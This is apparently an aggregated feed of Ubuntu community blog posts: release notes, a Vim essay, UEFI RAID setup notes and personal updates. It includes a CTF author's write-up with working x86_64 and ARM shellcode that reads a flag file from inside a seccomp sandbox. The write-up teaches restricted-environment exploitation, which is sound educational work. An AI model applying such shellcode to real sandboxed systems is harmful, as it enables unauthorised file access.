April 22, 2018

After 2.5 years of on-again/off-again development, a new stable release of MenuLibre is now available! This release includes a vast array of changes since 2.0.7 and is recommended for all users.

What’s New?

Since MenuLibre 2.0.7, the previous stable release.

General

  • Support for Budgie, Cinnamon, EDE, KDE Plasma, LXQt, MATE, and Pantheon desktop environments
  • Version 1.1 of the Desktop Entry specification is now supported
  • Improved KeyFile backend for better file support

New Features

  • Integrated window identification for the StartupWmClass key
  • New dialog and notification for reviewing invalid desktop entries
  • New button to test launchers without saving
  • New button to sort menu directory contents alphabetically
  • Subdirectories can now be added to preinstalled system paths
  • Menu updates are now delayed to prevent file writing collisions

Interface Updates

  • New layout preferences! Budgie, GNOME, and Pantheon utilize client side decorations (CSD) while other desktops continue to use server side decorations (SSD) with a toolbar and menu.
    • Want to switch? The -b and -t commandline flags allow you to set your preference.
  • Simplified and easier-to-use widgets for Name, Comment, DBusActivatable, Executable, Hidden, Icon, and Working Directory keys
  • Hidden items are now italicized in the treeview
  • Directories are now represented by the folder icon
  • Updated application icon

Downloads

Source tarball (md5, sig)

Available on Debian Testing/Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

on April 22, 2018 11:08 AM

Mugshot, the simple user configuration utility, has hit a new stable milestone! Release 0.4.0 wraps up the 0.3 development cycle with full camera support for the past several years of GTK+ releases (and a number of other fixes).

What’s New?

Since Mugshot 0.2.5, the previous stable release.

  • Improved camera support, powered by Cheese and Clutter
  • AccountsService integration for more reliable user detail parsing
  • Numerous bug fixes with file access, parsing, and permissions
  • Translation updates for Brazilian Portuguese, Catalan, Croatian, Czech, Danish, Dutch, Finnish, French, German, Greek, Icelandic, Italian, Lithuanian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, and Swedish

Downloads

Source tarball (md5, sig)

Available in Debian Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

on April 22, 2018 10:17 AM
The Release Candidate for Ubuntu Studio 18.04 is ready for testing. Download it here There are some known issues: Volume label still set to Beta base-files still not the final version kernel will have (at least) one more revision Please report any bugs using ubuntu-bug {package name}. Final release is scheduled to be released on […]
on April 22, 2018 02:34 AM

Initial RC (Release Candidate) images for the Kubuntu Bionic Beaver (18.04) are now available for testing.

The Kubuntu team will be releasing 18.04 on 26 April. The final Release Candidate milestone is available today, 21 April.

This is the first spin of a release candiate in preparation for the RC milestone. If major bugs are encountered and fixed, the RC images may be respun.

Kubuntu Beta pre-releases are NOT recommended for:

  • Regular users who are not aware of pre-release issue
  • Anyone who needs a stable system
  • Anyone uncomfortable running a possibly frequently broken system
  • Anyone in a production environment with data or workflows that need to be reliable

Kubuntu Beta pre-releases are recommended for:

  • Regular users who want to help us test by finding, reporting, and/or fixing bugs
  • Kubuntu, KDE, and Qt developers

Getting Kubuntu 18.04 RC testing images:

To upgrade to Kubuntu 18.04 pre-releases from 17.10, run sudo do-release-upgrade -d from a command line.

Download a Bootable image and put it onto a DVD or USB Drive via the download link at

http://iso.qa.ubuntu.com/qatracker/milestones/389/builds

This is also the direct link to report your findings and any bug reports you file.

See our release notes: https://wiki.ubuntu.com/BionicBeaver/ReleaseNotes/Kubuntu

Please report your results on the Release tracker.

on April 22, 2018 01:13 AM

Vim is an improved version of Vi, a known text editor available by default in UNIX distributions. Another alternative for modal editors is Emacs but they’re so different that I kind of feel they serve different purposes. Both are great, regardless.

I don’t feel vim is necessarily a geeky kind of taste or not. Vim introduced modal editing to me and that has changed my life, really. If you have ever tried vim, you may have noticed you have to press “I” or “A” (lower case) to start writing (note: I’m aware there are more ways to start editing but the purpose is not to cover Vim’s functionalities.). The fun part starts once you realize you can associate Insert and Append commands to something. And then editing text is like thinking of what you want the computer to show on the computer instead of struggling where you at before writing. The same goes for other commands which are easily converted to mnemonics and this is what helped getting comfortable with Vim. Note that Emacs does not have this kind of keybindings but they do have a Vim-like mode - Evil (Extensive Vi Layer). More often than not, I just need to think of what I want to accomplish and type the first letters. Like Replace, Visual, Delete, and so on. It is a modal editor after all, meaning it has modes for everything. This is also what increases my productivity when writing files. I just think of my intentions and Vim does the things for me.

Here’s another cool example. Imagine this Python line (do not fear, this is not a coding post):

def function(aParameterThatChanged)

In a non-modal editing text editor, you would need to pick your mouse, select the text carefully inside the parenthesis (you might be able to double click the text and it would highlight it) and then delete, write all over, etc. In Vim, there are basically two options to do that. You can type di( and that would d\elete i\nside the symbol you typed. How helpful is that? Want to blow your mind? Typing ci( would actually change i\nside the symbol by deleting and changing to insert mode automatically.

Vim has a significant learning curve, I’m aware of that. Many people get discouraged on the first try but sticking to Vim has changed how I perceive text writing and I know, for sure, it has been a positive change. I write faster, editing is an instant, I don’t need the mouse for anything at all, vim starts instantly and many other cool features. For those looking for customization, Vim is fully customizable without causing too much of a load in your CPU, like it happens in Atom. Vim is also easily accessible anywhere. Take IntelliJ for example, a Java IDE multi-platform. It even recommends installing the Vim plugin right-after the installation process. Obviously, I did it. In an UNIX terminal, Vim comes by default.

I just wanted to praise modal editing, more than Vim itself, although the tool is amazing. I believe everyone should know Vim. It is simpler than Emacs, has lots of potential and it can make you more productive. But modal editing got me addicted to this. I can’t install an IDE without looking for vim extensions.

I would like everyone to try Vi’s modal editing. It will change your life, I assure you, despite requiring a bit of time in the beginning. If you ever get stuck, just Google your problem and I’m 150% positive you will find an answer. As time goes by, I’m positive you will find out features of vim you didn’t even know it was possible.

Thanks for reading.

gsilvapt

on April 22, 2018 12:00 AM

April 21, 2018

Mako Hate

Benjamin Mako Hill

I recently discovered a prolific and sustained community of meme-makers on Tumblr dedicated to expressing their strong dislike for “Mako.”

Two tags with examples are #mako hate and #anti mako but there are many others.

“even Mako hates Mako…” meme. Found on this forum thread.

I’ve also discovered Tumblrs entirely dedicated to the topic!

For example, Let’s Roast Mako describes itself “A place to beat up Mako. In peace. It’s an inspiration to everyone!

The second is the Fuck Mako Blog which describes itself with series of tag-lines including “Mako can fuck right off and we’re really not sorry about that,” “Welcome aboard the SS Fuck-Mako;” and “Because Mako is unnecessary.” Sub-pages of the site include:

I’ll admit I’m a little disquieted.

on April 21, 2018 09:31 PM

Introduction

As the author of the “coder” series of challenges (Intel Coder, ARM Coder, Poly Coder, and OCD Coder) in the recent BSidesSF CTF, I wanted to share my perspective on the challenges. I can’t tell if the challenges were uninteresting, too hard, or both, but they were solved by far fewer teams than I had expected. (And than we had rated the challenges for when scoring them.)

The entire series of challenges were based on the premise “give me your shellcode and I’ll run it”, but with some limitations. Rather than forcing players to find and exploit a vulnerability, we wanted to teach players about dealing with restricted environments like sandboxes, unusual architectures, and situations where your shellcode might be manipulated by the process before it runs.

Overview

Each challenge requested the length of your shellcode followed by the shellcode and allowed for ~1k of shellcode (which is more than enough for any reasonable exploitation effort on these). Shellcode was placed into newly-allocated memory with RWX permissions, with a guard page above and below. A new stack was allocated similarly, but without the execute bit set.

Each challenge got a seccomp-bpf sandbox setup, with slight variations in the limitations of the sandbox to encourage players to look into how the sandbox is created:

  • All challenges allowed rt_sigreturn(), exit(), exit_group() and close() for housekeeping purposes.
  • Intel Coder allowed open() (with limited arguments) and sendfile().
  • ARM Coder allowed open(), read(), and write(), all with limited arguments.
  • Poly Coder allowed read() and write(), but the file descriptors were already opened for the player.
  • OCD Coder allowed open(), read(), write() and sendfile() with restrictions.

The shellcode was then executed by a helper function written in assembly. (To swap the stack then execute the shellcode.)

There were a few things that made these challenges harder than they might have otherwise been:

  • Stripped binaries
  • PIE binaries and ASLR
  • Statically linking libseccomp (although I thought I was doing players a favor with this, it does make the binary much larger)

A Seccomp Primer

Seccomp initially was a single system call that limited the calling thread to use a small subset of syscalls. seccomp-bpf extended this to use Berkeley Packet Filters (BPF) to allow for filtering system calls. The system call number and arguments (from registers) are placed into a structure, and the BPF is used to filter this structure. The filter can result in allowing or denying the syscall, and on a denied syscall, an error may be returned, a signal may be delivered to the calling thread, or the thread may be killed.

Because all of the registers are included in the structure, seccomp-bpf allows for filtering not only based on the system call itself, but on the arguments passed to the system call. One quirk of this is that it is completely unaware of the types of the arguments, and only operates on the contents of the registers used for passing arguments. Consequently, pointer types are compared by the pointer value and not by the contents pointed to. I actually hadn’t thought about this before writing this challenge and limiting the values passed to open(). All of the challenges allowing open limited it to ./flag.txt, so not only could you only open that one file, you could only do it by using the same pointer that was passed to the library functions that setup the filtering.

An interesting corollary is that if you limit system call arguments by passing in a pointer value, you probably want it to be a global, and you probably don’t want it to be in writable memory, so that an attacker can’t overwrite the desired string and still pass the same pointer.

Reverse Engineering the Sandbox

There’s a wonderful toolset called seccomp-tools that provides the ability to dump the BPF structure from the process as it runs by using ptrace(). If we run the Intel coder binary under seccomp-tools, we’ll see the following structure:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x11 0xc000003e  if (A != ARCH_X86_64) goto 0019
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x0f 0x00 0x40000000  if (A >= 0x40000000) goto 0019
 0004: 0x15 0x0d 0x00 0x00000003  if (A == close) goto 0018
 0005: 0x15 0x0c 0x00 0x0000000f  if (A == rt_sigreturn) goto 0018
 0006: 0x15 0x0b 0x00 0x00000028  if (A == sendfile) goto 0018
 0007: 0x15 0x0a 0x00 0x0000003c  if (A == exit) goto 0018
 0008: 0x15 0x09 0x00 0x000000e7  if (A == exit_group) goto 0018
 0009: 0x15 0x00 0x09 0x00000002  if (A != open) goto 0019
 0010: 0x20 0x00 0x00 0x00000014  A = args[0] >> 32
 0011: 0x15 0x00 0x07 0x00005647  if (A != 0x5647) goto 0019
 0012: 0x20 0x00 0x00 0x00000010  A = args[0]
 0013: 0x15 0x00 0x05 0x8bd01428  if (A != 0x8bd01428) goto 0019
 0014: 0x20 0x00 0x00 0x0000001c  A = args[1] >> 32
 0015: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0019
 0016: 0x20 0x00 0x00 0x00000018  A = args[1]
 0017: 0x15 0x00 0x01 0x00000000  if (A != 0x0) goto 0019
 0018: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0019: 0x06 0x00 0x00 0x00000000  return KILL

The first two lines check the architecture of the running binary (presumably because the system call numbers are architecture-dependent). The filter then loads the system call number to determine the behavior for each syscall. Lines 0004 through 0008 are syscalls that are allowed unconditionally. Line 0009 ensures that anything but the already-allowed syscalls or open() results in killing the process.

Lines 0010-0017 check the arguments passed to open(). Since the BPF can only compare 32 bits at a time, the 64-bit registers are split in two with shifts. The first few lines ensure that the filename string (args[0]) is a pointer with value 0x56478bd01428. Of course, due to ASLR, you’ll find that this value varies with each execution of the program, so no hard coding your pointer values here! Finally, it checks that the second argument (args[1]) to open() is 0x0, which corresponds to O_RDONLY. (No opening the flag for writing!)

seccomp-tools really makes this so much easier than manual reversing would be.

Solving Intel & ARM Coder

The solutions for both Intel Coder and ARM Coder are very similar. First, let’s determine the steps we need to undertake:

  1. Locate fhe ./flag.txt string that was used in the seccomp-bpf filter.
  2. Open ./flag.txt.
  3. Read the file and send the contents to the player. (sendfile() on Intel, read() and write() on ARM)

In order to not be a total jerk in these challenges, I ensured that one of the registers contained a value somewhere in the .text section of the binary, to make it somewhat easier to hunt for the ./flag.txt string. (This was actually always the address of the function that executed the player shellcode.) Consequently, finding the string should have been trivial using the commonly known egghunter techniques.

At this point, it’s basically just a straightforward shellcode to open() the file and send its contents. The entirety of my example solution for Intel Coder is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
BITS 64

; hunt for string based on rdx
hunt:
add rdx, 0x4
mov rax, 0x742e67616c662f2e   ; ./flag.t
cmp rax, [rdx]
jne hunt

xor rax, rax
mov rdi, rdx              ; path
xor rax, rax
mov al, 2                 ; rax for SYS_open
xor rdx, rdx              ; mode
xor rsi, rsi              ; flags
syscall

xor rdi, rdi
inc rdi                   ; out_fd
mov rsi, rax              ; in_fd from open
xor rdx, rdx              ; offset
mov r10, 0xFF             ; count
mov rax, 40               ; SYS_sendfile
syscall

xor rax, rax
mov al, 60                ; SYS_exit
xor rdi, rdi              ; code
syscall

For ARM coder, the solution is much the same, except using read() and write() instead of sendfile().

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
.section .text
.global shellcode
.arm

shellcode:
  # r0 = my shellcode
  # r1 = new stack
  # r2 = some pointer

  # load ./fl into r3
  MOVW r3, #0x2f2e
  MOVT r3, #0x6c66
  # load ag.t into r4
  MOVW r4, #0x6761
  MOVT r4, #0x742e
hunt:
  LDR r5, [r2, #0x4]!
  TEQ r5, r3
  BNE hunt
  LDR r5, [r2, #0x4]
  TEQ r5, r4
  BNE hunt
  # r2 should now have the address of ./flag.txt

  # SYS_open
  MOVW r7, #5
  MOV r0, r2
  MOVW r1, #0
  MOVW r2, #0
  SWI #0

  # SYS_read
  MOVW r7, #3
  MOV r1, sp
  MOV r2, #0xFF
  SWI #0

  # SYS_write
  MOVW r7, #4
  MOV r2, r0
  MOV r1, sp
  MOVW r0, #1
  SWI #0

  # SYS_exit
  MOVW r7, #1
  MOVW r0, #0
  SWI #0

Poly Coder

Poly Coder was actually not very difficult if you had solved both of the above challenges. It required only reading from an already open FD and writing to an already open FD. You did have to search through the FDs to find which were open, but this was easy as any that were not would return -1, so looping until an amount greater than 0 was read/written was all that was required.

To produce shellcode that ran on both architectures, you could use an instruction that was a jump in one architecture and benign in the other. One such example is EB 7F 00 32, which is a jmp 0x7F in x86_64, but does some AND operation on r0 in ARM. Prefixing your shellcode with that, followed by up to 120 bytes of ARM shellcode, then a few bytes of padding, and the x86_64 shellcode at the end would work.

OCD Coder

As I recall it, one of the other members of our CTF organizing team joked “we should sort their shellcode before we run it.” While intended as a joke, I took this as a challenge and began work to see if this was solvable. Obviously, the smaller the granularity (e.g., sorting by byte) the more difficult this becomes. I settled on trying to find a solution where it was sorted by 32-bit (DWORD) chunks, and found one with about 2 hours of effort.

Rather than try to write the entire shellcode in something that would sort correctly, I wrote a small loader that was manually tweaked to sort. This loader would then take the following shellcode and extract the lower 3 bytes of each DWORD and concatenate them. In this way, I could force ordering by inserting a one-byte tag at the most significant position of each 3 byte chunk.

It looks something like this:

1
2
3
4
5
6
7
8
9
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]
[tag][3 bytes shellcode]

...

[3 bytes shellcode][3 by
tes shellcode][3 bytes s
hellcode]

The loader is as simple as this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
BITS 32

# assumes shellcode @eax
mov ecx, 0x24
and eax, eax
add eax, ecx
mov ebx, eax
inc edx
loop:
  mov edx, [eax]
  nop
  add eax, 4
  nop
  mov [ebx], edx
  inc ebx
  inc ebx
  nop
  inc ebx
  nop
  nop
  nop
  dec ecx
  nop
  nop
  nop
  jnz loop
nop

The large number of nops was necessary to get the loader to sort properly, as were tricks like using 3 inc ebx instructions instead of add ebx, 3. There’s even trash instructions like inc edx that have no affect on the output, but serve just to get the shellcode to sort the way I needed. The x86 opcode reference was incredibly useful in finding bytes with the desired value to make things work.

I have no doubt there are shorter or more efficient solutions, but this got the job done.

Conclusion

We’ll soon be releasing the source code to all of the challenges, so you can see the details of how this was all put together, but I wanted to share my insight into the challenges from the author’s point of view. Hopefully those that did solve it (or tried to solve it) had a good time doing so or learned something new.

on April 21, 2018 07:00 AM

April 20, 2018

Hyak on Hyak

Benjamin Mako Hill

I recently fulfilled a yearslong dream of launching a job on Hyak* on Hyak.

Hyak onHyak

 


* Hyak is the University of Washington’s supercomputer which my research group uses for most of our computation-intensive research.
M/V Hyak is a Super-class ferry operated by the Washington State Ferry System.
on April 20, 2018 10:26 PM
Yes! Everything is ready for the incoming UbuCon Europe 2018 in Xixón! 😃

We'll have an awesome weekend of conferences (with 4 parallel talks), podcasts, stands, social events... Most of them are in English, but there will be in Spanish & Asturian too.

\o/
The speakers are coming from all these countries:

\o/


Are you ready for an incredible UbuCon? :)

Testing the Main Room #noedits
Remember that you have transport discounts and a main social event: the espicha.

See you in Xixón! ❤

+ info
on April 20, 2018 03:56 PM

I spent some time yesterday building out a UEFI server that didn’t have on-board hardware RAID for its system drives. In these situations, I always use Linux’s md RAID1 for the root filesystem (and/or /boot). This worked well for BIOS booting since BIOS just transfers control blindly to the MBR of whatever disk it sees (modulo finding a “bootable partition” flag, etc, etc). This means that BIOS doesn’t really care what’s on the drive, it’ll hand over control to the GRUB code in the MBR.

With UEFI, the boot firmware is actually examining the GPT partition table, looking for the partition marked with the “EFI System Partition” (ESP) UUID. Then it looks for a FAT32 filesystem there, and does more things like looking at NVRAM boot entries, or just running BOOT/EFI/BOOTX64.EFI from the FAT32. Under Linux, this .EFI code is either GRUB itself, or Shim which loads GRUB.

So, if I want RAID1 for my root filesystem, that’s fine (GRUB will read md, LVM, etc), but how do I handle /boot/efi (the UEFI ESP)? In everything I found answering this question, the answer was “oh, just manually make an ESP on each drive in your RAID and copy the files around, add a separate NVRAM entry (with efibootmgr) for each drive, and you’re fine!” I did not like this one bit since it meant things could get out of sync between the copies, etc.

The current implementation of Linux’s md RAID puts metadata at the front of a partition. This solves more problems than it creates, but it means the RAID isn’t “invisible” to something that doesn’t know about the metadata. In fact, mdadm warns about this pretty loudly:

# mdadm --create /dev/md0 --level 1 --raid-disks 2 /dev/sda1 /dev/sdb1 mdadm: Note: this array has metadata at the start and may not be suitable as a boot device. If you plan to store '/boot' on this device please ensure that your boot-loader understands md/v1.x metadata, or use --metadata=0.90

Reading from the mdadm man page:

-e, --metadata= ... 1, 1.0, 1.1, 1.2 default Use the new version-1 format superblock. This has fewer restrictions. It can easily be moved between hosts with different endian-ness, and a recovery operation can be checkpointed and restarted. The different sub-versions store the superblock at different locations on the device, either at the end (for 1.0), at the start (for 1.1) or 4K from the start (for 1.2). "1" is equivalent to "1.2" (the commonly preferred 1.x format). "default" is equivalent to "1.2".

First we toss a FAT32 on the RAID (mkfs.fat -F32 /dev/md0), and looking at the results, the first 4K is entirely zeros, and file doesn’t see a filesystem:

# dd if=/dev/sda1 bs=1K count=5 status=none | hexdump -C 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00001000 fc 4e 2b a9 01 00 00 00 00 00 00 00 00 00 00 00 |.N+.............| ... # file -s /dev/sda1 /dev/sda1: Linux Software RAID version 1.2 ...

So, instead, we’ll use --metadata 1.0 to put the RAID metadata at the end:

# mdadm --create /dev/md0 --level 1 --raid-disks 2 --metadata 1.0 /dev/sda1 /dev/sdb1 ... # mkfs.fat -F32 /dev/md0 # dd if=/dev/sda1 bs=1 skip=80 count=16 status=none | xxd 00000000: 2020 4641 5433 3220 2020 0e1f be77 7cac FAT32 ...w|. # file -s /dev/sda1 /dev/sda1: ... FAT (32 bit)

Now we have a visible FAT32 filesystem on the ESP. UEFI should be able to boot whatever disk hasn’t failed, and grub-install will write to the RAID mounted at /boot/efi.

However, we’re left with a new problem: on (at least) Debian and Ubuntu, grub-install attempts to run efibootmgr to record which disk UEFI should boot from. This fails, though, since it expects a single disk, not a RAID set. In fact, it returns nothing, and tries to run efibootmgr with an empty -d argument:

Installing for x86_64-efi platform. efibootmgr: option requires an argument -- 'd' ... grub-install: error: efibootmgr failed to register the boot entry: Operation not permitted. Failed: grub-install --target=x86_64-efi WARNING: Bootloader is not properly installed, system may not be bootable

Luckily my UEFI boots without NVRAM entries, and I can disable the NVRAM writing via the “Update NVRAM variables to automatically boot into Debian?” debconf prompt when running: dpkg-reconfigure -p low grub-efi-amd64

So, now my system will boot with both or either drive present, and updates from Linux to /boot/efi are visible on all RAID members at boot-time. HOWEVER there is one nasty risk with this setup: if UEFI writes anything to one of the drives (which this firmware did when it wrote out a “boot variable cache” file), it may lead to corrupted results once Linux mounts the RAID (since the member drives won’t have identical block-level copies of the FAT32 any more).

To deal with this “external write” situation, I see some solutions:

  • Make the partition read-only when not under Linux. (I don’t think this is a thing.)
  • Create higher-level knowledge of the root-filesystem RAID configuration is needed to keep a collection of filesystems manually synchronized instead of doing block-level RAID. (Seems like a lot of work and would need redesign of /boot/efi into something like /boot/efi/booted, /boot/efi/spare1, /boot/efi/spare2, etc)
  • Prefer one RAID member’s copy of /boot/efi and rebuild the RAID at every boot. If there were no external writes, there’s no issue. (Though what’s really the right way to pick the copy to prefer?)

Since mdadm has the “--update=resync” assembly option, I can actually do the latter option. This required updating /etc/mdadm/mdadm.conf to add <ignore> on the RAID’s ARRAY line to keep it from auto-starting:

ARRAY <ignore> metadata=1.0 UUID=123...

(Since it’s ignored, I’ve chosen /dev/md100 for the manual assembly below.) Then I added the noauto option to the /boot/efi entry in /etc/fstab:

/dev/md100 /boot/efi vfat noauto,defaults 0 0

And finally I added a systemd oneshot service that assembles the RAID with resync and mounts it:

[Unit] Description=Resync /boot/efi RAID DefaultDependencies=no After=local-fs.target [Service] Type=oneshot ExecStart=/sbin/mdadm -A /dev/md100 --uuid=123... --update=resync ExecStart=/bin/mount /boot/efi RemainAfterExit=yes [Install] WantedBy=sysinit.target

(And don’t forget to run “update-initramfs -u” so the initramfs has an updated copy of /dev/mdadm/mdadm.conf.)

If mdadm.conf supported an “update=” option for ARRAY lines, this would have been trivial. Looking at the source, though, that kind of change doesn’t look easy. I can dream!

And if I wanted to keep a “pristine” version of /boot/efi that UEFI couldn’t update I could rearrange things more dramatically to keep the primary RAID member as a loopback device on a file in the root filesystem (e.g. /boot/efi.img). This would make all external changes in the real ESPs disappear after resync. Something like:

# truncate --size 512M /boot/efi.img # losetup -f --show /boot/efi.img /dev/loop0 # mdadm --create /dev/md100 --level 1 --raid-disks 3 --metadata 1.0 /dev/loop0 /dev/sda1 /dev/sdb1

And at boot just rebuild it from /dev/loop0, though I’m not sure how to “prefer” that partition…

© 2018, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

on April 20, 2018 12:34 AM

April 19, 2018

Diversity Update

Rhonda D'Vine

I have to excuse for being silent for that long. Way too many things happened. In fact I already wrote most of this last fall, but then something happened that did impact me too much to finalize this entry. And with that I want to go a bit into details how I write my blog entries:
I start to write them in English, I like to cross-reference things, and after I'm done I go over it and write it again in German. That process helps me proof-reading the English part, but it also means that it takes a fair amount of time. And the longer the entries get the more energy the translation and proof reading part takes, too. That's mostly also the reason why I tend to write longer entries when I find the energy and time for it.

Anyway, the first thing that I want to mention here finally happened last June: I officially got changed my name and gender/sex marker in my papers! That was a very happy moment in so many ways. A week later I got my new passport, finally managed to book my flight to Debconf in my name. Yay me, I exist!

Then, Stretch was released. I have to admit I had very little to do, wasn't involved in the release process, neither from the website team nor anywhere else because ...

... because I was packing my stuff that weekend, because on June 21st, a second thing finally happened: I got the keys to my flat in the Que[e]rbau!! Yes, I'm aware that we still need to work on the website. The building company actually did make a big event out of it, called every single person onto stage and handed over the keys. And it made me happy to be able to receive my key in my name and not one I don't relate to since a long while anymore. It did hurt seeing that happening to someone else from our house, even though they knew what the Que[e]rbau is about ... And: I moved right in the same day. Gave up my old flat the following week, even though I didn't have much furniture nor a kitchen but I was waiting way too long to be able to not be there. And just watch that sunset from my balcony. <3

And I mentioned it in the last blog post already, the European Lesbian* Conference organization needed more and more work, too. The program for it started to finalize, but there were still more than enough things to do. I totally fell into this, this was the first time I really felt what intersectionality means and that it's not just a label but an internal part of this conference. The energy going on in the team on that grounds is really outstanding, and I'm totally happy to be part of this effort.

And then came along Debconf17 in Montreal. It was nice to be with a fair amount of people that grew on me like a family over the years. And interestingly I got the notice that there was a Trans March going on, so I joined that. It was a pleasure meeting Sophie LaBelle and Chase Ross there. I wasn't aware that Chase was from Montreal, so that part was a surprise. Sophie I knew, and I brought her back to Vienna in November, right before the Transgender Day of Remembrance. :)

But one of the two moving speeches at the march were from Charlie Rose titled My Gender Is Black. I managed to get a recording of this and another great speech from another Black Lives Matters activist, and hope I'll be able to put them online at some point. For the time being the link to the text should be able to help.

And then Debconf itself started. And I held the Debian Diversity Round Table. While the title might had been misleading, because this group isn't officially formed yet, it turned out to get a fair amount of interest. I started off with why I called for it, that I intentionally chose to not have it video taped for people to be able to speak more freely and after a short introduction round with names, pronouns and other things people wanted to share we had some interesting discussions on why people think this is a good idea, what direction to move. A few ideas did spring up, and then ... time ran out. So actually we scheduled a continuation BoF to further enhance the topic. At the end of that we came up with a pretty good consensual view on how to move forward. Unfortunately I didn't manage yet to follow up on that and feel quite bad about it. :/

Because, after returning, getting back into work, and needing a bit more time for EL*C I started to feel serious pain in my back and my leg which seems to be a slipped disc and was on sick leave for about two months. The pain was too much, I even had to stay at the hospital for two weeks because my stomach acted up too.

At the end of October we had a grand opening: We have a community space in our Que[e]rbau in which we built sort of a bar, with cooking facility and hi-fi equipment. And we intentionally opened it up to the public. It's name is Yella Yella! Nachbar_innentreff. We named it after Yella Hertzka who was an important feminist at the start of the 20th century. The park on the other side of the street is called Yella Hertzka park, so the pun in the name with the connection to the arabic proverb Yalla Yalla is intentional.

With the Yella Yella a fair amount of internal discussions emerged, we all only started to live together, so naturally this took a fair amount of energy and discussions. Things take time to get a feeling for all the people. There were several interviews made, and events to get organized to get it running.

And then out of the sudden it turned 2018 and I still haven't published this post. I'm sorry 'bout that, but sometimes there are other things needing time. And here I am. Time move on even if we don't look at it.

A recent project that I had the honor to be part of is my movement is limitless [trans_non-binary short]. It was interesting to think about the topic whether gender identity affects the way you dance. And to seen and hear other people's approach to it.

At the upcoming Linuxtage Graz there will be a session about Common misconceptions about names and spaces and communities because they were enforcing a realname policy – at a community event. Not only is this a huge issue for trans people but also works against privacy researchers or people from the community that noone really knows by the name in their papers. The discussions that happened on twitter or in the background were partly a fair bit disturbing. Let's hope that we'll manage to make a good panel.

Which brings us to a panel for the upcoming Debconf in Taiwan. There is a suggestion to have a Gender Forum at the Openday. I'm still not completely sure what it should cover or what is expected for it and I guess it's still open for suggestions. There will be a plan, let's see to make it diverse and great!

I won't promise to send the next update sooner, but I'll try to get back into it. Right now I'm also working on a (German language) submission for a non-binary YouTube project and it would be great to see that thing lift off. I'll be more verbose on that front.

Thanks for reading so far, and read you soon. :)

/personal | permanent link | Comments: 0 | Flattr this

on April 19, 2018 07:53 PM

Interviewing people behind communitheme. Today: Frederik

As discussed last week when unveiling the communitheme snap for ubuntu 18.04 LTS, here is a suite of interview this week on some members of the core contributor team shaping this entirely community-driven theme.

Today is the turn of Frederik, frederik-f on the community hub.

Who are you? What are you doing/where are you working? Give us some words and background about you!

My name is Frederik, I live in Germany and I am working as a java software developer in my daily job.

I am using Ubuntu since 5 years and quickly started to report bugs and issues when they jumped into my face. Apart from that, I like good music, and beautiful software. I also make my own music in my free time.

What are you mainly contributor areas on communitheme?

I mainly contribute to the shell theme but also work on implementing some design ideas in the gtk theme.

How did you hear about new theming effort on ubuntu, what made you willing to participate actively to it?

I followed the design process from the beginning on the community website and was very interested in it. Not only because I love ubuntu but also because I finished my thesis last year, where I needed to read some design books about UX and interaction design. I loved how they created the mockups and discussed about them in a very professional, mature, friendly and yet unemotional way - accepting and rejecting different opinions.

How is the interaction with the larger community, how do you deal with different ideas and opinions on the community hub, issues opened against the projects, PR?

I feel there could be even more interaction and I hope there will be more promotion about this website so more people would share their opinions.

What did you think (honestly) about the decision for not shipping it by default on 18.04, but curating it for a little while?

While ambiance uses very antiquated design ideas, it still represents the ubuntu brand. Of course I was a little disappointed, but that was also the point where I decided to contribute actual code and make PRs. I felt like they need more help.

I think if the snap will be promoted in the software center like for example spotify or skype, many LTS users could try it and then in the end, we got our theme shining on the LTS as well.

Do you think the snap approach for 18.04 will give us more flexibility before shipping a finale version?

Yes - this was a very good idea. I am curious about how it will work out with all the other snaps which fallback to adwaita at the moment.

Any idea or wish on what the theme name (communitheme is a codename project) should be?

My idea would be: Orenji which means “Orange” on japanese, which could fit to our origami icon theme suru.

Any last words or questions I should have asked you?

This sounds like you want to execute me! So why didn’t you ask for my last meal? :)

Thanks Frederik!

Next interview coming up soon, stay tuned! :)

on April 19, 2018 04:10 PM

S11E07 – Seven Years in Tibet - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

This week we meet a sloth and buy components for the Hades Canyon NUC. The Windows File Manager gets open sourced, Iran are going to block Telegram, PostmarketOS explore creating an open source baseband, Microsoft make a custom Linux distro called Azure Sphere and we round the community news.

It’s Season 11 Episode 07 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on April 19, 2018 02:00 PM

After years of using Thinkpads, I went for a Dell XPS 13 with Ubuntu. Although I had bought devices with Linux pre-installed and laptops for friends as well, this  was going to be my first own laptop coming with Ubuntu straight from the factory.

 

The hardware

The specs looked great (big SSD disk, enough memory to play around with VMs/containers, etc.), but I had to brush away some fond memories of old laptops, where I was able to easily replace parts (memory, screen, disk, power jack, keyboard and more for my x220). With the XPS this was not easily going to be possible anymore.

Anyway, the new machine arrived in the office. It looked great, it was light,  it was really well-built and whatever task I threw at the machine, it dealt with it nicely. In general I really liked the hardware and how the machine felt a lot. I knew I was going to be happy with this.

